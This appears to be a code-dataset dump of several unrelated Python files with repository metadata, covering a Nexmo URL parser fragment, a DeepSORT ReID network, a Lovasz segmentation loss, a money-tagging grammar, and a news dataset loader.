results['apikey'] = NotifyNexmo.unquote(results['user'])
results['secret'] = NotifyNexmo.unquote(results['password'])
if 'key' in results['qsd'] and len(results['qsd']['key']):
results['apikey'] = \
NotifyNexmo.unquote(results['qsd']['key'])
if 'secret' in results['qsd'] and len(results['qsd']['secret']):
results['secret'] = \
NotifyNexmo.unquote(results['qsd']['secret'])
if 'from' in results['qsd'] and len(results['qsd']['from']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['from'])
if 'source' in results['qsd'] and len(results['qsd']['source']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['source'])
if 'ttl' in results['qsd'] and len(results['qsd']['ttl']):
results['ttl'] = \
NotifyNexmo.unquote(results['qsd']['ttl'])
if 'to' in results['qsd'] and len(results['qsd']['to']):
results['targets'] += \
NotifyNexmo.parse_phone_no(results['qsd']['to'])
return results
| true
| true
|
1c423ab64dfbb1ededc7018e40988e7380610cec
| 3,421
|
py
|
Python
|
EfficientGCNv1/utils/tracking/deepsort/deep/model.py
|
myatthukyaw/res_efficient_gcns
|
89280d10f1d4864dfa0a5c3813db11e074dcb2f2
|
[
"MIT"
] | null | null | null |
EfficientGCNv1/utils/tracking/deepsort/deep/model.py
|
myatthukyaw/res_efficient_gcns
|
89280d10f1d4864dfa0a5c3813db11e074dcb2f2
|
[
"MIT"
] | null | null | null |
EfficientGCNv1/utils/tracking/deepsort/deep/model.py
|
myatthukyaw/res_efficient_gcns
|
89280d10f1d4864dfa0a5c3813db11e074dcb2f2
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
def __init__(self, c_in, c_out, is_downsample=False):
super(BasicBlock, self).__init__()
self.is_downsample = is_downsample
if is_downsample:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=2, padding=1, bias=False)
else:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(c_out)
self.relu = nn.ReLU(True)
self.conv2 = nn.Conv2d(c_out, c_out, 3, stride=1,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(c_out)
if is_downsample:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=2, bias=False),
nn.BatchNorm2d(c_out)
)
elif c_in != c_out:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=1, bias=False),
nn.BatchNorm2d(c_out)
)
self.is_downsample = True
def forward(self, x):
y = self.conv1(x)
y = self.bn1(y)
y = self.relu(y)
y = self.conv2(y)
y = self.bn2(y)
if self.is_downsample:
x = self.downsample(x)
return F.relu(x.add(y), True)
def make_layers(c_in, c_out, repeat_times, is_downsample=False):
blocks = []
for i in range(repeat_times):
if i == 0:
blocks += [BasicBlock(c_in, c_out, is_downsample=is_downsample)]
else:
blocks += [BasicBlock(c_out, c_out)]
return nn.Sequential(*blocks)
class Net(nn.Module):
def __init__(self, num_classes=751, reid=False):
super(Net, self).__init__()
# 3 128 64
self.conv = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
# nn.Conv2d(32,32,3,stride=1,padding=1),
# nn.BatchNorm2d(32),
# nn.ReLU(inplace=True),
nn.MaxPool2d(3, 2, padding=1),
)
# 32 64 32
self.layer1 = make_layers(64, 64, 2, False)
# 32 64 32
self.layer2 = make_layers(64, 128, 2, True)
# 64 32 16
self.layer3 = make_layers(128, 256, 2, True)
# 128 16 8
self.layer4 = make_layers(256, 512, 2, True)
# 256 8 4
self.avgpool = nn.AvgPool2d((8, 4), 1)
# 256 1 1
self.reid = reid
self.classifier = nn.Sequential(
nn.Linear(512, 256),
nn.BatchNorm1d(256),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(256, num_classes),
)
def forward(self, x):
x = self.conv(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
# B x 128
if self.reid:
x = x.div(x.norm(p=2, dim=1, keepdim=True))
return x
# classifier
x = self.classifier(x)
return x
if __name__ == '__main__':
net = Net()
x = torch.randn(4, 3, 128, 64)
y = net(x)
import ipdb
ipdb.set_trace()
| 31.1
| 77
| 0.504239
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
def __init__(self, c_in, c_out, is_downsample=False):
super(BasicBlock, self).__init__()
self.is_downsample = is_downsample
if is_downsample:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=2, padding=1, bias=False)
else:
self.conv1 = nn.Conv2d(
c_in, c_out, 3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(c_out)
self.relu = nn.ReLU(True)
self.conv2 = nn.Conv2d(c_out, c_out, 3, stride=1,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(c_out)
if is_downsample:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=2, bias=False),
nn.BatchNorm2d(c_out)
)
elif c_in != c_out:
self.downsample = nn.Sequential(
nn.Conv2d(c_in, c_out, 1, stride=1, bias=False),
nn.BatchNorm2d(c_out)
)
self.is_downsample = True
def forward(self, x):
y = self.conv1(x)
y = self.bn1(y)
y = self.relu(y)
y = self.conv2(y)
y = self.bn2(y)
if self.is_downsample:
x = self.downsample(x)
return F.relu(x.add(y), True)
def make_layers(c_in, c_out, repeat_times, is_downsample=False):
blocks = []
for i in range(repeat_times):
if i == 0:
blocks += [BasicBlock(c_in, c_out, is_downsample=is_downsample)]
else:
blocks += [BasicBlock(c_out, c_out)]
return nn.Sequential(*blocks)
class Net(nn.Module):
def __init__(self, num_classes=751, reid=False):
super(Net, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.MaxPool2d(3, 2, padding=1),
)
self.layer1 = make_layers(64, 64, 2, False)
self.layer2 = make_layers(64, 128, 2, True)
self.layer3 = make_layers(128, 256, 2, True)
self.layer4 = make_layers(256, 512, 2, True)
self.avgpool = nn.AvgPool2d((8, 4), 1)
self.reid = reid
self.classifier = nn.Sequential(
nn.Linear(512, 256),
nn.BatchNorm1d(256),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(256, num_classes),
)
def forward(self, x):
x = self.conv(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
if self.reid:
x = x.div(x.norm(p=2, dim=1, keepdim=True))
return x
x = self.classifier(x)
return x
if __name__ == '__main__':
net = Net()
x = torch.randn(4, 3, 128, 64)
y = net(x)
import ipdb
ipdb.set_trace()
| true
| true
|
1c423b8b7b57531cefb41a87ab4a95bea00517a7
| 7,780
|
py
|
Python
|
src/losses/lovasz.py
|
vpeopleonatank/segmentation
|
6c93e14f465117ca1818e7d9cdd95ffc37e15f45
|
[
"MIT"
] | null | null | null |
src/losses/lovasz.py
|
vpeopleonatank/segmentation
|
6c93e14f465117ca1818e7d9cdd95ffc37e15f45
|
[
"MIT"
] | null | null | null |
src/losses/lovasz.py
|
vpeopleonatank/segmentation
|
6c93e14f465117ca1818e7d9cdd95ffc37e15f45
|
[
"MIT"
] | null | null | null |
# type: ignore
"""
Lovasz-Softmax and Jaccard hinge loss in PyTorch
Maxim Berman 2018 ESAT-PSI KU Leuven (MIT License)
"""
from __future__ import print_function, division
from typing import Optional
import torch
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.modules.loss import _Loss
from .constants import BINARY_MODE, MULTICLASS_MODE, MULTILABEL_MODE
try:
from itertools import ifilterfalse
except ImportError: # py3k
from itertools import filterfalse as ifilterfalse
__all__ = ["LovaszLoss"]
def _lovasz_grad(gt_sorted):
"""Compute gradient of the Lovasz extension w.r.t sorted errors
See Alg. 1 in paper
"""
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted).float().cumsum(0)
jaccard = 1.0 - intersection / union
if p > 1: # cover 1-pixel case
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def _lovasz_hinge(logits, labels, per_image=True, ignore=None):
"""
Binary Lovasz hinge loss
logits: [B, H, W] Variable, logits at each pixel (between -infinity and +infinity)
labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)
per_image: compute the loss per image instead of per batch
ignore: void class id
"""
if per_image:
loss = mean(
_lovasz_hinge_flat(*_flatten_binary_scores(log.unsqueeze(0), lab.unsqueeze(0), ignore))
for log, lab in zip(logits, labels)
)
else:
loss = _lovasz_hinge_flat(*_flatten_binary_scores(logits, labels, ignore))
return loss
def _lovasz_hinge_flat(logits, labels):
"""Binary Lovasz hinge loss
Args:
logits: [P] Variable, logits at each prediction (between -infinity and +infinity)
labels: [P] Tensor, binary ground truth labels (0 or 1)
ignore: label to ignore
"""
if len(labels) == 0:
# only void pixels, the gradients should be 0
return logits.sum() * 0.0
signs = 2.0 * labels.float() - 1.0
errors = 1.0 - logits * Variable(signs)
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = _lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def _flatten_binary_scores(scores, labels, ignore=None):
"""Flattens predictions in the batch (binary case)
Remove labels equal to 'ignore'
"""
scores = scores.view(-1)
labels = labels.view(-1)
if ignore is None:
return scores, labels
valid = labels != ignore
vscores = scores[valid]
vlabels = labels[valid]
return vscores, vlabels
# --------------------------- MULTICLASS LOSSES ---------------------------
def _lovasz_softmax(probas, labels, classes="present", per_image=False, ignore=None):
"""Multi-class Lovasz-Softmax loss
Args:
@param probas: [B, C, H, W] Variable, class probabilities at each prediction (between 0 and 1).
Interpreted as binary (sigmoid) output with outputs of size [B, H, W].
@param labels: [B, H, W] Tensor, ground truth labels (between 0 and C - 1)
@param classes: 'all' for all, 'present' for classes present in labels, or a list of classes to average.
@param per_image: compute the loss per image instead of per batch
@param ignore: void class labels
"""
if per_image:
loss = mean(
_lovasz_softmax_flat(*_flatten_probas(prob.unsqueeze(0), lab.unsqueeze(0), ignore), classes=classes)
for prob, lab in zip(probas, labels)
)
else:
loss = _lovasz_softmax_flat(*_flatten_probas(probas, labels, ignore), classes=classes)
return loss
def _lovasz_softmax_flat(probas, labels, classes="present"):
"""Multi-class Lovasz-Softmax loss
Args:
@param probas: [P, C] Variable, class probabilities at each prediction (between 0 and 1)
@param labels: [P] Tensor, ground truth labels (between 0 and C - 1)
@param classes: 'all' for all, 'present' for classes present in labels, or a list of classes to average.
"""
if probas.numel() == 0:
# only void pixels, the gradients should be 0
return probas * 0.0
C = probas.size(1)
losses = []
class_to_sum = list(range(C)) if classes in ["all", "present"] else classes
for c in class_to_sum:
fg = (labels == c).type_as(probas) # foreground for class c
if classes == "present" and fg.sum() == 0:
continue
if C == 1:
if len(classes) > 1:
raise ValueError("Sigmoid output possible only with 1 class")
class_pred = probas[:, 0]
else:
class_pred = probas[:, c]
errors = (fg - class_pred).abs()
errors_sorted, perm = torch.sort(errors, 0, descending=True)
perm = perm.data
fg_sorted = fg[perm]
losses.append(torch.dot(errors_sorted, _lovasz_grad(fg_sorted)))
return mean(losses)
def _flatten_probas(probas, labels, ignore=None):
"""Flattens predictions in the batch"""
if probas.dim() == 3:
# assumes output of a sigmoid layer
B, H, W = probas.size()
probas = probas.view(B, 1, H, W)
C = probas.size(1)
probas = torch.movedim(probas, 0, -1) # [B, C, Di, Dj, Dk...] -> [B, C, Di...Dk, C]
probas = probas.contiguous().view(-1, C) # [P, C]
labels = labels.view(-1)
if ignore is None:
return probas, labels
valid = labels != ignore
vprobas = probas[valid]
vlabels = labels[valid]
return vprobas, vlabels
# --------------------------- HELPER FUNCTIONS ---------------------------
def isnan(x):
return x != x
def mean(values, ignore_nan=False, empty=0):
"""Nanmean compatible with generators."""
values = iter(values)
if ignore_nan:
values = ifilterfalse(isnan, values)
try:
n = 1
acc = next(values)
except StopIteration:
if empty == "raise":
raise ValueError("Empty mean")
return empty
for n, v in enumerate(values, 2):
acc += v
if n == 1:
return acc
return acc / n
class LovaszLoss(_Loss):
def __init__(
self,
mode: str,
per_image: bool = False,
ignore_index: Optional[int] = None,
from_logits: bool = True,
):
"""Implementation of Lovasz loss for image segmentation task.
It supports binary, multiclass and multilabel cases
Args:
mode: Loss mode 'binary', 'multiclass' or 'multilabel'
ignore_index: Label that indicates ignored pixels (does not contribute to loss)
per_image: If True loss computed per each image and then averaged, else computed per whole batch
Shape
- **y_pred** - torch.Tensor of shape (N, C, H, W)
- **y_true** - torch.Tensor of shape (N, H, W) or (N, C, H, W)
Reference
https://github.com/BloodAxe/pytorch-toolbelt
"""
assert mode in {BINARY_MODE, MULTILABEL_MODE, MULTICLASS_MODE}
super().__init__()
self.mode = mode
self.ignore_index = ignore_index
self.per_image = per_image
def forward(self, y_pred, y_true):
if self.mode in {BINARY_MODE, MULTILABEL_MODE}:
loss = _lovasz_hinge(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
elif self.mode == MULTICLASS_MODE:
y_pred = y_pred.softmax(dim=1)
loss = _lovasz_softmax(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
else:
raise ValueError("Wrong mode {}.".format(self.mode))
return loss
| 34.122807
| 112
| 0.621465
|
from __future__ import print_function, division
from typing import Optional
import torch
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.modules.loss import _Loss
from .constants import BINARY_MODE, MULTICLASS_MODE, MULTILABEL_MODE
try:
from itertools import ifilterfalse
except ImportError:
from itertools import filterfalse as ifilterfalse
__all__ = ["LovaszLoss"]
def _lovasz_grad(gt_sorted):
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted).float().cumsum(0)
jaccard = 1.0 - intersection / union
if p > 1:
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def _lovasz_hinge(logits, labels, per_image=True, ignore=None):
if per_image:
loss = mean(
_lovasz_hinge_flat(*_flatten_binary_scores(log.unsqueeze(0), lab.unsqueeze(0), ignore))
for log, lab in zip(logits, labels)
)
else:
loss = _lovasz_hinge_flat(*_flatten_binary_scores(logits, labels, ignore))
return loss
def _lovasz_hinge_flat(logits, labels):
if len(labels) == 0:
return logits.sum() * 0.0
signs = 2.0 * labels.float() - 1.0
errors = 1.0 - logits * Variable(signs)
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = _lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def _flatten_binary_scores(scores, labels, ignore=None):
scores = scores.view(-1)
labels = labels.view(-1)
if ignore is None:
return scores, labels
valid = labels != ignore
vscores = scores[valid]
vlabels = labels[valid]
return vscores, vlabels
def _lovasz_softmax(probas, labels, classes="present", per_image=False, ignore=None):
if per_image:
loss = mean(
_lovasz_softmax_flat(*_flatten_probas(prob.unsqueeze(0), lab.unsqueeze(0), ignore), classes=classes)
for prob, lab in zip(probas, labels)
)
else:
loss = _lovasz_softmax_flat(*_flatten_probas(probas, labels, ignore), classes=classes)
return loss
def _lovasz_softmax_flat(probas, labels, classes="present"):
if probas.numel() == 0:
return probas * 0.0
C = probas.size(1)
losses = []
class_to_sum = list(range(C)) if classes in ["all", "present"] else classes
for c in class_to_sum:
fg = (labels == c).type_as(probas)
if classes == "present" and fg.sum() == 0:
continue
if C == 1:
if len(classes) > 1:
raise ValueError("Sigmoid output possible only with 1 class")
class_pred = probas[:, 0]
else:
class_pred = probas[:, c]
errors = (fg - class_pred).abs()
errors_sorted, perm = torch.sort(errors, 0, descending=True)
perm = perm.data
fg_sorted = fg[perm]
losses.append(torch.dot(errors_sorted, _lovasz_grad(fg_sorted)))
return mean(losses)
def _flatten_probas(probas, labels, ignore=None):
if probas.dim() == 3:
B, H, W = probas.size()
probas = probas.view(B, 1, H, W)
C = probas.size(1)
probas = torch.movedim(probas, 0, -1)
probas = probas.contiguous().view(-1, C)
labels = labels.view(-1)
if ignore is None:
return probas, labels
valid = labels != ignore
vprobas = probas[valid]
vlabels = labels[valid]
return vprobas, vlabels
def isnan(x):
return x != x
def mean(values, ignore_nan=False, empty=0):
values = iter(values)
if ignore_nan:
values = ifilterfalse(isnan, values)
try:
n = 1
acc = next(values)
except StopIteration:
if empty == "raise":
raise ValueError("Empty mean")
return empty
for n, v in enumerate(values, 2):
acc += v
if n == 1:
return acc
return acc / n
class LovaszLoss(_Loss):
def __init__(
self,
mode: str,
per_image: bool = False,
ignore_index: Optional[int] = None,
from_logits: bool = True,
):
assert mode in {BINARY_MODE, MULTILABEL_MODE, MULTICLASS_MODE}
super().__init__()
self.mode = mode
self.ignore_index = ignore_index
self.per_image = per_image
def forward(self, y_pred, y_true):
if self.mode in {BINARY_MODE, MULTILABEL_MODE}:
loss = _lovasz_hinge(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
elif self.mode == MULTICLASS_MODE:
y_pred = y_pred.softmax(dim=1)
loss = _lovasz_softmax(y_pred, y_true, per_image=self.per_image, ignore=self.ignore_index)
else:
raise ValueError("Wrong mode {}.".format(self.mode))
return loss
| true
| true
|
1c423d1db13036f9e4d5254adda577280f573f86
| 90
|
py
|
Python
|
algorithms/algorithm.py
|
songheony/oplp
|
7947fec7c0cf84d327c5bb3406e5dfd465e82a10
|
[
"MIT"
] | null | null | null |
algorithms/algorithm.py
|
songheony/oplp
|
7947fec7c0cf84d327c5bb3406e5dfd465e82a10
|
[
"MIT"
] | null | null | null |
algorithms/algorithm.py
|
songheony/oplp
|
7947fec7c0cf84d327c5bb3406e5dfd465e82a10
|
[
"MIT"
] | null | null | null |
class Algorithm:
def update(self, *args, **kwargs):
raise NotImplementedError
| 22.5
| 38
| 0.677778
|
class Algorithm:
def update(self, *args, **kwargs):
raise NotImplementedError
| true
| true
|
1c423d68a9156819e5928c17fa91da75b8ce1ef1
| 4,341
|
py
|
Python
|
src/inverse_text_normalization/ori/taggers/money.py
|
yashiagar1999/indict_punc
|
8697ac5a5245c7e0d35b0777b1dc6fb1b8d6d525
|
[
"MIT"
] | 15
|
2021-07-30T18:18:47.000Z
|
2022-02-14T09:04:19.000Z
|
src/inverse_text_normalization/ori/taggers/money.py
|
yashiagar1999/indict_punc
|
8697ac5a5245c7e0d35b0777b1dc6fb1b8d6d525
|
[
"MIT"
] | 1
|
2021-12-15T12:42:12.000Z
|
2022-02-15T05:33:00.000Z
|
src/inverse_text_normalization/ori/taggers/money.py
|
yashiagar1999/indict_punc
|
8697ac5a5245c7e0d35b0777b1dc6fb1b8d6d525
|
[
"MIT"
] | 4
|
2021-07-30T10:03:38.000Z
|
2021-12-01T14:46:54.000Z
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from inverse_text_normalization.ori.data_loader_utils import get_abs_path
from inverse_text_normalization.ori.graph_utils import (
NEMO_DIGIT,
NEMO_SIGMA,
GraphFst,
convert_space,
delete_extra_space,
delete_space,
get_singulars,
insert_space,
)
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
# from inverse_text_normalization.lang_params import LANG
# lang_data_path = f'inverse_text_normalization/data/{LANG}_data/'
lang_data_path = 'data/'
class MoneyFst(GraphFst):
"""
Finite state transducer for classifying money
e.g. twelve dollars and five cents -> money { integer_part: "12" fractional_part: 05 currency: "$" }
Args:
cardinal: Cardinal GraphFST
decimal: Decimal GraphFST
"""
def __init__(self, cardinal: GraphFst, decimal: GraphFst):
super().__init__(name="money", kind="classify")
# quantity, integer_part, fractional_part, currency, style(depr)
cardinal_graph = cardinal.graph_no_exception
graph_decimal_final = decimal.final_graph_wo_negative
unit = pynini.string_file(get_abs_path(lang_data_path+"currency.tsv"))
unit_singular = pynini.invert(unit)
unit_plural = get_singulars(unit_singular)
graph_unit_singular = pynutil.insert("currency: \"") + convert_space(unit_singular) + pynutil.insert("\"")
graph_unit_plural = pynutil.insert("currency: \"") + convert_space(unit_plural) + pynutil.insert("\"")
add_leading_zero_to_double_digit = (NEMO_DIGIT + NEMO_DIGIT) | (pynutil.insert("0") + NEMO_DIGIT)
# twelve dollars (and) fifty cents, zero cents
cents_standalone = (
pynutil.insert("fractional_part: \"")
+ pynini.union(
pynutil.add_weight(((NEMO_SIGMA - "one") @ cardinal_graph), -0.7) @ add_leading_zero_to_double_digit
+ delete_space
+ pynutil.delete("cents"),
pynini.cross("one", "01") + delete_space + pynutil.delete("cent"),
)
+ pynutil.insert("\"")
)
optional_cents_standalone = pynini.closure(
delete_space
+ pynini.closure(pynutil.delete("and") + delete_space, 0, 1)
+ insert_space
+ cents_standalone,
0,
1,
)
# twelve dollars fifty, only after integer
optional_cents_suffix = pynini.closure(
delete_extra_space
+ pynutil.insert("fractional_part: \"")
+ pynutil.add_weight(cardinal_graph @ add_leading_zero_to_double_digit, -0.7)
+ pynutil.insert("\""),
0,
1,
)
graph_integer = (
pynutil.insert("integer_part: \"")
+ ((NEMO_SIGMA - "one") @ cardinal_graph)
+ pynutil.insert("\"")
+ delete_extra_space
+ (graph_unit_plural | graph_unit_singular)
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_integer |= (
pynutil.insert("integer_part: \"")
+ pynini.cross("one", "1")
+ pynutil.insert("\"")
+ delete_extra_space
+ graph_unit_singular
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_decimal = graph_decimal_final + delete_extra_space + graph_unit_plural
graph_decimal |= pynutil.insert("currency: \"$\" integer_part: \"0\" ") + cents_standalone
final_graph = graph_integer | graph_decimal
final_graph = self.add_tokens(final_graph)
self.fst = final_graph.optimize()
| 37.747826
| 116
| 0.646164
|
from inverse_text_normalization.ori.data_loader_utils import get_abs_path
from inverse_text_normalization.ori.graph_utils import (
NEMO_DIGIT,
NEMO_SIGMA,
GraphFst,
convert_space,
delete_extra_space,
delete_space,
get_singulars,
insert_space,
)
try:
import pynini
from pynini.lib import pynutil
PYNINI_AVAILABLE = True
except (ModuleNotFoundError, ImportError):
PYNINI_AVAILABLE = False
lang_data_path = 'data/'
class MoneyFst(GraphFst):
def __init__(self, cardinal: GraphFst, decimal: GraphFst):
super().__init__(name="money", kind="classify")
cardinal_graph = cardinal.graph_no_exception
graph_decimal_final = decimal.final_graph_wo_negative
unit = pynini.string_file(get_abs_path(lang_data_path+"currency.tsv"))
unit_singular = pynini.invert(unit)
unit_plural = get_singulars(unit_singular)
graph_unit_singular = pynutil.insert("currency: \"") + convert_space(unit_singular) + pynutil.insert("\"")
graph_unit_plural = pynutil.insert("currency: \"") + convert_space(unit_plural) + pynutil.insert("\"")
add_leading_zero_to_double_digit = (NEMO_DIGIT + NEMO_DIGIT) | (pynutil.insert("0") + NEMO_DIGIT)
cents_standalone = (
pynutil.insert("fractional_part: \"")
+ pynini.union(
pynutil.add_weight(((NEMO_SIGMA - "one") @ cardinal_graph), -0.7) @ add_leading_zero_to_double_digit
+ delete_space
+ pynutil.delete("cents"),
pynini.cross("one", "01") + delete_space + pynutil.delete("cent"),
)
+ pynutil.insert("\"")
)
optional_cents_standalone = pynini.closure(
delete_space
+ pynini.closure(pynutil.delete("and") + delete_space, 0, 1)
+ insert_space
+ cents_standalone,
0,
1,
)
optional_cents_suffix = pynini.closure(
delete_extra_space
+ pynutil.insert("fractional_part: \"")
+ pynutil.add_weight(cardinal_graph @ add_leading_zero_to_double_digit, -0.7)
+ pynutil.insert("\""),
0,
1,
)
graph_integer = (
pynutil.insert("integer_part: \"")
+ ((NEMO_SIGMA - "one") @ cardinal_graph)
+ pynutil.insert("\"")
+ delete_extra_space
+ (graph_unit_plural | graph_unit_singular)
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_integer |= (
pynutil.insert("integer_part: \"")
+ pynini.cross("one", "1")
+ pynutil.insert("\"")
+ delete_extra_space
+ graph_unit_singular
+ (optional_cents_standalone | optional_cents_suffix)
)
graph_decimal = graph_decimal_final + delete_extra_space + graph_unit_plural
graph_decimal |= pynutil.insert("currency: \"$\" integer_part: \"0\" ") + cents_standalone
final_graph = graph_integer | graph_decimal
final_graph = self.add_tokens(final_graph)
self.fst = final_graph.optimize()
| true
| true
|
1c423fb9b382926c97effb864db3316e9698d827
| 2,137
|
py
|
Python
|
data/local_news_data/baltimore_sun/loader.py
|
tpsatish95/covid19-search-engine
|
e09ae172216e204f5efc284ead99d17b4461e159
|
[
"Apache-2.0"
] | 1
|
2020-06-14T16:52:55.000Z
|
2020-06-14T16:52:55.000Z
|
data/local_news_data/baltimore_sun/loader.py
|
tpsatish95/covid19-search-engine
|
e09ae172216e204f5efc284ead99d17b4461e159
|
[
"Apache-2.0"
] | 1
|
2020-05-06T14:28:10.000Z
|
2020-05-06T14:28:10.000Z
|
data/local_news_data/baltimore_sun/loader.py
|
tpsatish95/covid19-search-engine
|
e09ae172216e204f5efc284ead99d17b4461e159
|
[
"Apache-2.0"
] | null | null | null |
import os
import re
from collections import defaultdict
from nltk.tokenize import word_tokenize
from data.template import Dataset, Document, Text
class BaltimoreSunCovidDataset(Dataset):
def __init__(self, base_path):
self.base_path = base_path
self.documents = None
super().__init__()
def read_raw(self, filename):
docs = [defaultdict(list)] # empty 0 index
category = ''
with open(os.path.join(self.base_path, filename)) as f:
i = 0
for line in f:
line = line.strip()
if line.startswith('.I'):
i = int(line[3:])
docs.append(defaultdict(list))
elif re.match(r'\.\w', line):
category = line[1]
elif line != '':
docs[i][category].append(Text(line, [word.lower()
for word in word_tokenize(line)]))
return docs
def load_docs(self, filename):
raw_docs = self.read_raw(filename)
documents = list()
for doc_id, _ in enumerate(raw_docs[1:]):
title, content = None, None
raw, tokenized = "", list()
for entry in raw_docs[doc_id+1]["T"]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
title = Text(raw, tokenized)
raw, tokenized = "", list()
for category in ["A", "K", "W"]:
for entry in raw_docs[doc_id+1][category]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
content = Text(raw, tokenized)
documents.append(Document(doc_id+1, title, content, raw_docs[doc_id+1]["U"][0].raw))
self.documents = documents
def load_queries(self, filename):
pass
def load_relevant_docs(self, filename):
pass
# load the data
base_path = './data/local_news_data/baltimore_sun'
baltimore_sun_covid_data = BaltimoreSunCovidDataset(base_path)
baltimore_sun_covid_data.load_docs('BALTIMORE_SUN.ALL')
| 31.895522
| 96
| 0.552644
|
import os
import re
from collections import defaultdict
from nltk.tokenize import word_tokenize
from data.template import Dataset, Document, Text
class BaltimoreSunCovidDataset(Dataset):
def __init__(self, base_path):
self.base_path = base_path
self.documents = None
super().__init__()
def read_raw(self, filename):
docs = [defaultdict(list)]
category = ''
with open(os.path.join(self.base_path, filename)) as f:
i = 0
for line in f:
line = line.strip()
if line.startswith('.I'):
i = int(line[3:])
docs.append(defaultdict(list))
elif re.match(r'\.\w', line):
category = line[1]
elif line != '':
docs[i][category].append(Text(line, [word.lower()
for word in word_tokenize(line)]))
return docs
def load_docs(self, filename):
raw_docs = self.read_raw(filename)
documents = list()
for doc_id, _ in enumerate(raw_docs[1:]):
title, content = None, None
raw, tokenized = "", list()
for entry in raw_docs[doc_id+1]["T"]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
title = Text(raw, tokenized)
raw, tokenized = "", list()
for category in ["A", "K", "W"]:
for entry in raw_docs[doc_id+1][category]:
raw += " " + entry.raw
tokenized.extend(entry.tokenized)
content = Text(raw, tokenized)
documents.append(Document(doc_id+1, title, content, raw_docs[doc_id+1]["U"][0].raw))
self.documents = documents
def load_queries(self, filename):
pass
def load_relevant_docs(self, filename):
pass
base_path = './data/local_news_data/baltimore_sun'
baltimore_sun_covid_data = BaltimoreSunCovidDataset(base_path)
baltimore_sun_covid_data.load_docs('BALTIMORE_SUN.ALL')
| true
| true
|
1c4240229e4a83fba94c99ce1dbe3f737b8b1fda
| 3,026
|
py
|
Python
|
examples/NN/1_MNIST/mnist_mlp_initializers.py
|
deephealthproject/pyeddl
|
a6c304b7cec2b342aa84a7b3ace2d91c69ad5a84
|
[
"MIT"
] | 8
|
2020-02-28T06:39:17.000Z
|
2022-02-01T09:59:51.000Z
|
examples/NN/1_MNIST/mnist_mlp_initializers.py
|
deephealthproject/pyeddl
|
a6c304b7cec2b342aa84a7b3ace2d91c69ad5a84
|
[
"MIT"
] | 26
|
2019-10-30T10:53:21.000Z
|
2022-02-17T08:56:37.000Z
|
examples/NN/1_MNIST/mnist_mlp_initializers.py
|
deephealthproject/pyeddl
|
a6c304b7cec2b342aa84a7b3ace2d91c69ad5a84
|
[
"MIT"
] | 4
|
2019-10-17T07:48:37.000Z
|
2022-02-03T10:04:37.000Z
|
# Copyright (c) 2019-2021 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
